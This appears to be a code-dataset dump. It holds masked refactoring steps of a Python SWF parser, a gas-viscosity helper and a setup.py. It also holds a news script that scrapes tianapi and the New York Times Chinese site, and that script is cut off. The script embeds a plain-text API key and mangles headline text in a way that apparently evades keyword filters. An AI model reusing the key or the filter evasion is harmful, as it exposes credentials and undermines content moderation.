print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = 
lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, 
tagLength)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n \"\"\"generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values\"\"\"\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 
'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if 
tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('filepath required')\n else:\n file = SWFFile(sys.argv[1])\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n \"\"\"generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values\"\"\"\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\ntagCodeTranslation = {(0): 'End', (1): 'ShowFrame', (2): 'DefineShape', (4):\n 'PlaceObject', (5): 'RemoveObject', (6): 'DefineBits', (7):\n 'DefineButton', (8): 'JPEGTables', (9): 'SetBackgroundColor', (10):\n 'DefineFont', (11): 'DefineText', (12): 'DoAction', (13):\n 'DefineFontInfo', (14): 'DefineSound', (15): 'StartSound', (17):\n 'DefineButtonSound', (18): 'SoundStreamHead', (19): 'SoundStreamBlock',\n (20): 'DefineBitsLossless', (21): 'DefineBitsJPEG2', (22):\n 'DefineShape2', (23): 'DefineButtonCxform', (24): 'Protect', (26):\n 'PlaceObject2', (28): 'RemoveObject2', (32): 'DefineShape3', (33):\n 'DefineText2', (34): 'DefineButton2', (35): 'DefineBitsJPEG3', (36):\n 'DefineBitsLossless2', (37): 'DefineEditText', (39): 'DefineSprite', (\n 41): 'ProductInfo', (43): 'FrameLabel', (45): 'SoundStreamHead2', (46):\n 'DefineMorphShape', (48): 'DefineFont2', (56): 'ExportAssets', (57):\n 'ImportAssets', (58): 'EnableDebugger', (59): 'DoInitAction', (60):\n 'DefineVideoStream', (61): 'VideoFrame', (62): 'DefineFontInfo2', (63):\n 'DebugID', (64): 'EnableDebugger2', (65): 'ScriptLimits', (66):\n 'SetTabIndex', (69): 'FileAttributes', (70): 'PlaceObject3', (71):\n 'ImportAssets2', (73): 'DefineFontAlignZones', (74): 'CSMTextSettings',\n (75): 'DefineFont3', (76): 'SymbolClass', (77): 'Metadata', (78):\n 'DefineScalingGrid', (82): 'DoABC', (83): 'DefineShape4', (84):\n 'DefineMorphShape2', (86): 'DefineSceneAndFrameLabelData', (87):\n 'DefineBinaryData', (88): 'DefineFontName', (89): 
'StartSound2', (90):\n 'DefineBitsJPEG4', (91): 'DefineFont4', (93): 'EnableTelemetry'}\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def 
unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('filepath required')\n else:\n file = SWFFile(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n\n\nimport sys\nimport os\nimport math\n\nimport tempfile\n\nimport zlib\nimport lzma\nimport struct\nimport bitstruct\n\n\n\n# a swf file unpacker and analyzer\n# majority of information taken from https://www.adobe.com/devnet/swf.html (version 19)\n# some additional information taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\n\n\nclass SWFFileUnpackingException(Exception):\n\t'''generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values'''\n\nclass SWFRect(object):\n\tdef __init__(self, xmin, xmax, ymin, ymax):\n\t\tself.xmin = xmin\n\t\tself.xmax = xmax\n\t\tself.ymin = ymin\n\t\tself.ymax = ymax\n\tdef __str__(self):\n\t\treturn 'SWFRect('+str(self.xmin)+','+str(self.xmax)+','+str(self.ymin)+','+str(self.ymax)+')'\n\n\ntagCodeTranslation = {\n\t0:'End',\n\t1:'ShowFrame',\n\t2:'DefineShape',\n\t4:'PlaceObject',\n\t5:'RemoveObject',\n\t6:'DefineBits',\n\t7:'DefineButton',\n\t8:'JPEGTables',\n\t9:'SetBackgroundColor',\n\t10:'DefineFont',\n\t11:'DefineText',\n\t12:'DoAction',\n\t13:'DefineFontInfo',\n\t14:'DefineSound',\n\t15:'StartSound',\n\t17:'DefineButtonSound',\n\t18:'SoundStreamHead',\n\t19:'SoundStreamBlock',\n\t20:'DefineBitsLossless',\n\t21:'DefineBitsJPEG2',\n\t22:'DefineShape2',\n\t23:'DefineButtonCxform',\n\t24:'Protect',\n\t26:'PlaceObject2',\n\t28:'RemoveObject2',\n\t32:'DefineShape3',\n\t33:'DefineText2',\n\t34:'DefineButton2',\n\t35:'DefineBitsJPEG3',\n\t36:'DefineBitsLossless2',\n\t37:'DefineEditText',\n\t39:'DefineSprite',\n\t41:'ProductInfo', # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\t43:'FrameLabel',\n\t45:'SoundStreamHead2',\n\t46:'DefineMorphShape',\n\t48:'DefineFont2',\n\t56:'ExportAssets',\n\t57:'ImportAssets',\n\t58:'EnableDebugger',\n\t59:'DoInitAction',\n\t60:'DefineVideoStream',\n\t61:'VideoFrame',\n\t62:'DefineFontInfo2',\n\t63:'DebugID', # taken from 
https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\t64:'EnableDebugger2',\n\t65:'ScriptLimits',\n\t66:'SetTabIndex',\n\t69:'FileAttributes',\n\t70:'PlaceObject3',\n\t71:'ImportAssets2',\n\t73:'DefineFontAlignZones',\n\t74:'CSMTextSettings',\n\t75:'DefineFont3',\n\t76:'SymbolClass',\n\t77:'Metadata',\n\t78:'DefineScalingGrid',\n\t82:'DoABC',\n\t83:'DefineShape4',\n\t84:'DefineMorphShape2',\n\t86:'DefineSceneAndFrameLabelData',\n\t87:'DefineBinaryData',\n\t88:'DefineFontName',\n\t89:'StartSound2',\n\t90:'DefineBitsJPEG4',\n\t91:'DefineFont4',\n\t93:'EnableTelemetry',\n}\n\n\nclass SWFTag(object):\n\tdef __init__(self, code, length):\n\t\tself.code = code\n\t\tself.length = length\n\n\t\tself.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n\t\tif self.typeName == '!UNKNOWN!':\n\t\t\tprint('warning: unknown swf tag code: '+str(self.code))\n\tdef isEndTag(self):\n\t\treturn self.typeName == 'End'\n\tdef __str__(self):\n\t\treturn 'SWFTag(code='+str(self.code)+' \"'+self.typeName+'\", length='+str(self.length)+')'\n\n\nclass SWFFile(object):\n\tdef __init__(self, filepath):\n\t\tself.filepath = filepath\n\n\t\tself.compression = None\n\t\tself.version = None\n\t\tself.fileLength = None\n\t\tself.frameSize = None\n\t\tself.frameRate = None\n\t\tself.frameCount = None\n\n\t\tself.tags = []\n\n\t\tself.chunkSize = 16 * 4096\n\n\t\tself.load()\n\n\tdef load(self):\n\t\t'''loads the swf file at the filepath'''\n\t\tself.handle = open(self.filepath, 'rb')\n\n\t\tself.unpackHeader1()\n\t\tprint('signature:', self.signature)\n\t\tprint('version:', self.version)\n\t\tprint('fileLength:', self.fileLength)\n\n\t\tif self.compression != 'none':\n\t\t\tself.decompress()\n\n\t\tself.unpackHeader2()\n\n\t\tprint('frameSize:', self.frameSize)\n\t\tprint('frameRate:', self.frameRate)\n\t\tprint('frameCount:', self.frameCount)\n\n\t\tself.unpackTags()\n\t\tfor tag in self.tags:\n\t\t\tprint(tag)\n\t\t\tif tag.typeName == '!UNKNOWN!':\n\t\t\t\tprint('warning: unknown 
tag!')\n\n\n\tdef decompress(self):\n\t\t'''replaces the handle with a tempfile handle with all content decompressed'''\n\t\ttemp = tempfile.TemporaryFile('w+b')\n\t\tif self.compression == 'zlib':\n\t\t\tdecompressor = zlib.decompressobj()\n\t\telif self.compression == 'lzma':\n\t\t\tdecompressor = lzma.LZMADecompressor()\n\t\telse:\n\t\t\traise Exception(\"unknown compression algorithm: \"+self.compression)\n\t\tchunk = self.handle.read(self.chunkSize)\n\t\twhile len(chunk) > 0:\n\t\t\ttemp.write(decompressor.decompress(chunk))\n\t\t\tchunk = self.handle.read(self.chunkSize)\n\t\ttemp.seek(0)\n\t\tself.handle = temp\n\n\tdef unpackHeader1(self):\n\t\t'''unpacks the first 8 bytes of the header and figures out what compression there is'''\n\t\theader = self.handle.read(8)\n\t\tsignature, self.version, self.fileLength = struct.unpack('<3sBI', header)\n\n\t\tsignature = signature.decode('ascii')\n\t\tif signature == 'FWS':\n\t\t\tself.compression = 'none'\n\t\telif signature == 'CWS':\n\t\t\tself.compression = 'zlib'\n\t\telif signature == 'ZWS':\n\t\t\tself.compression = 'lzma'\n\t\telse:\n\t\t\traise SWFFileUnpackingException('unknown file signature: \"'+signature+'\"')\n\n\t\tself.signature = signature\n\n\tdef unpackHeader2(self):\n\t\t'''unpacks the rest of the header data that might have been compressed'''\n\t\tself.frameSize = self.unpackRect()\n\t\tself.frameRate, self.frameCount = struct.unpack('<HH', self.handle.read(4))\n\t\t# frameRate is an 8.8 float actually, but i'm not sure how to unpack that...\n\n\tdef unpackRect(self):\n\t\tdata = self.handle.read(1)\n\t\tsize, = bitstruct.unpack('u5', data)\n\t\tdata += self.handle.read(math.ceil((size * 4 - 3) / 8))\n\t\txmin, xmax, ymin, ymax = bitstruct.unpack('p5'+('s'+str(size))*4, data)\n\t\treturn SWFRect(xmin, xmax, ymin, ymax)\n\n\tdef unpackTags(self):\n\t\tsample = self.handle.read(2)\n\t\ttag = None\n\t\twhile len(sample) > 0:\n\t\t\tif tag is not None and tag.isEndTag():\n\t\t\t\tprint('warning: swf 
has tags after an end tag!')\n\t\t\tself.handle.seek(-2, os.SEEK_CUR)\n\t\t\ttag = self.unpackTag()\n\t\t\tself.tags.append(tag)\n\n\t\t\tsample = self.handle.read(2)\n\n\tdef unpackTag(self):\n\t\ttag = self.unpackTagHeader()\n\t\tself.handle.read(tag.length)\n\t\treturn tag\n\tdef unpackTagHeader(self):\n\t\tdata, = struct.unpack('<H', self.handle.read(2))\n\t\ttagCode = data >> 6\n\t\ttagLength = data & 0x3f\n\t\tif tagLength == 0x3f:\n\t\t\ttagLength, = struct.unpack('<I', self.handle.read(4))\n\t\treturn SWFTag(tagCode, tagLength)\n\n\n\n\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint('filepath required')\n\telse:\n\t\tfile = SWFFile(sys.argv[1])\n\n\nif __name__ == '__main__':\n\tmain()\n",
"step-ids": [
17,
18,
20,
22,
24
]
}
|
[
17,
18,
20,
22,
24
] |
#!/usr/bin/env python3
def GetDensity(T, P, config):
    """Ideal-gas density: rho = P / (R * T), with R read from the config tree."""
    gas_constant = config["Flow"]["mixture"]["gasConstant"]
    return P / (gas_constant * T)
def GetViscosity(T, config):
    """Return the dynamic viscosity at temperature T for the configured model.

    Supported config["Flow"]["mixture"]["viscosityModel"]["type"] values:
      - "Constant":   fixed value `Visc`
      - "PowerLaw":   ViscRef * (T / TempRef) ** 0.7
      - "Sutherland": ViscRef * (T / TempRef)**1.5 * (TempRef + SRef) / (T + SRef)

    Raises:
        ValueError: for an unrecognized model type. (Previously this was an
        `assert False`, which is stripped under `python -O` and would then
        fall through to an unbound-variable NameError.)
    """
    # Hoist the repeated deep lookups into one local.
    model = config["Flow"]["mixture"]["viscosityModel"]
    kind = model["type"]
    if kind == "Constant":
        return model["Visc"]
    if kind == "PowerLaw":
        return model["ViscRef"] * (T / model["TempRef"]) ** 0.7
    if kind == "Sutherland":
        return (model["ViscRef"] * (T / model["TempRef"]) ** 1.5
                * (model["TempRef"] + model["SRef"]) / (T + model["SRef"]))
    raise ValueError("unknown viscosity model type: {!r}".format(kind))
|
normal
|
{
"blob_id": "0e47a7d9cd6809886674291d6a535dd18205a012",
"index": 5455,
"step-1": "<mask token>\n",
"step-2": "def GetDensity(T, P, config):\n return P / (T * config['Flow']['mixture']['gasConstant'])\n\n\n<mask token>\n",
"step-3": "def GetDensity(T, P, config):\n return P / (T * config['Flow']['mixture']['gasConstant'])\n\n\ndef GetViscosity(T, config):\n if config['Flow']['mixture']['viscosityModel']['type'] == 'Constant':\n viscosity = config['Flow']['mixture']['viscosityModel']['Visc']\n elif config['Flow']['mixture']['viscosityModel']['type'] == 'PowerLaw':\n viscosity = config['Flow']['mixture']['viscosityModel']['ViscRef'] * (T\n / config['Flow']['mixture']['viscosityModel']['TempRef']) ** 0.7\n elif config['Flow']['mixture']['viscosityModel']['type'] == 'Sutherland':\n viscosity = config['Flow']['mixture']['viscosityModel']['ViscRef'] * (T\n / config['Flow']['mixture']['viscosityModel']['TempRef']\n ) ** 1.5 * (config['Flow']['mixture']['viscosityModel'][\n 'TempRef'] + config['Flow']['mixture']['viscosityModel']['SRef']\n ) / (T + config['Flow']['mixture']['viscosityModel']['SRef'])\n else:\n assert False\n return viscosity\n",
"step-4": "#!/usr/bin/env python3\n\ndef GetDensity(T, P, config):\n return P/(T*config[\"Flow\"][\"mixture\"][\"gasConstant\"])\n\ndef GetViscosity(T, config):\n if (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"Constant\"):\n viscosity = config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"Visc\"]\n elif (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"PowerLaw\"):\n viscosity = config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"ViscRef\"]*(T/config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"])**0.7\n elif (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"Sutherland\"):\n viscosity = (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"ViscRef\"]*(T/config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"])**1.5)*(config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"]+config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"SRef\"])/(T+config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"SRef\"])\n else: \n assert False\n return viscosity\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from setuptools import setup

# Packaging metadata for the nodepool harness distribution, kept in one
# mapping so the values are easy to scan and the setup() call stays tiny.
PACKAGE_INFO = dict(
    name='nodepool_harness',
    version='0.1dev',
    description='Nodepool harness',
    packages=['nodepool_harness', 'statsd', 'apscheduler'],
    install_requires=["PyYAML", "python-novaclient", "paramiko", "sqlalchemy"],
    entry_points={
        'console_scripts': [
            'nh-install-node = nodepool_harness.scripts:install_node',
        ],
    },
)

setup(**PACKAGE_INFO)
|
normal
|
{
"blob_id": "61ff5fae02d18d51595e8050d97244574e7d8af1",
"index": 6419,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-3": "from setuptools import setup\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-4": "from setuptools import setup\n\n\nsetup(\n name='nodepool_harness',\n version='0.1dev',\n description='Nodepool harness',\n packages=['nodepool_harness', 'statsd', 'apscheduler'],\n install_requires=[\"PyYAML\", \"python-novaclient\", \"paramiko\", \"sqlalchemy\"],\n entry_points = {\n 'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node',\n ]\n }\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
# Chinese labels for the lunar calendar, indexed by the month/day numbers
# that sxtwl reports (Lmc for months, Ldi for days).
ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"]
rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \
    u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \
    u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"]
# Shared sxtwl lunar-calendar instance used by china_lunar().
lunar = sxtwl.Lunar()
# 2. Convert today's solar (Gregorian) date to the Chinese lunar date.
def china_lunar():
    """Return a pair ``(iso_date, lunar_text)`` for today.

    ``iso_date`` is today's date as ``YYYY-MM-DD``; ``lunar_text`` renders the
    lunar month/day in Chinese using the module-level ``ymc``/``rmc`` tables
    and the shared sxtwl ``lunar`` calendar object.
    """
    today = str(date.today())
    now = datetime.datetime.now()
    lunar_day = lunar.getDayBySolar(int(now.year), int(now.month), int(now.day))
    # BUG FIX: the original if/else produced the same string in both branches.
    # A leap lunar month is conventionally prefixed with "闰".
    if lunar_day.Lleap:
        china_day = "农历:闰{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
    else:
        china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
    return today, china_day
import json
def morning_news():
    """Fetch today's headline bulletin from the tianapi service.

    Returns one numbered entry per item, formatted as "N:title\\nurl\\n";
    when an item carries no url, its image source is appended instead.
    """
    news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
    payload = dict(requests.get(news_api).json())
    print(payload)
    entries = []
    for index, item in enumerate(payload['newslist'], start=1):
        # Fall back to the image source only when there is no article url.
        img_url = item['imgsrc'] if item['url'] == '' else ''
        entries.append(str(index) + ":" + item['title'] + "\n" + item['url'] + img_url + "\n")
    return ''.join(entries)
def news_put():
    """Compose the full morning-news message: header line plus the bulletin."""
    solar_date, lunar_date = china_lunar()
    return '【早间新闻】 ' + solar_date + " " + lunar_date + "\n" + morning_news()
# Desktop-browser User-Agent for the NYT request below, so the site serves
# the regular desktop page rather than blocking the default client string.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}
def NewYork_news(page=1):
    """Scrape titles and summaries from the NYT Chinese "society" section.

    Returns one numbered block per headline: the title and summary are both
    run through str_list() before formatting.
    """
    society = 'https://cn.nytimes.com/society/{}/'.format(page)
    page_tree = lxml.etree.HTML(requests.get(url=society, headers=headers).text)
    titles = page_tree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
    summaries = page_tree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
    # NOTE(review): the hrefs are extracted but never used in the output.
    links = page_tree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
    report = ''
    for position, anchor in enumerate(titles, start=1):
        summary = summaries[titles.index(anchor)]
        report += (str(position) + ":" + str_list(anchor.text) + '。' + '\n'
                   + ' 概要:' + str_list(summary.text) + '。' + '\n'
                   + ' 详情:' + '\n' + '\n')
    return report
def NewYork_news_put(page=0):
    """Build the NYT-Chinese news message with today's date in the header.

    NOTE(review): the default page here is 0 while NewYork_news defaults
    to 1 -- confirm this asymmetry is intentional.
    """
    solar_date, lunar_date = china_lunar()
    return '【纽约时报中文网】' + solar_date + " " + lunar_date + "\n" + NewYork_news(page)
def str_list(t):
    """Return *t* with an underscore appended after every character.

    The character '中' is replaced by 'Z' before the underscore is added
    (presumably to dodge keyword filtering -- confirm with the callers).
    """
    return ''.join(('Z' if ch == '中' else ch) + '_' for ch in t)
|
normal
|
{
"blob_id": "e1d0648825695584d3ea518db961a9178ea0c66a",
"index": 50,
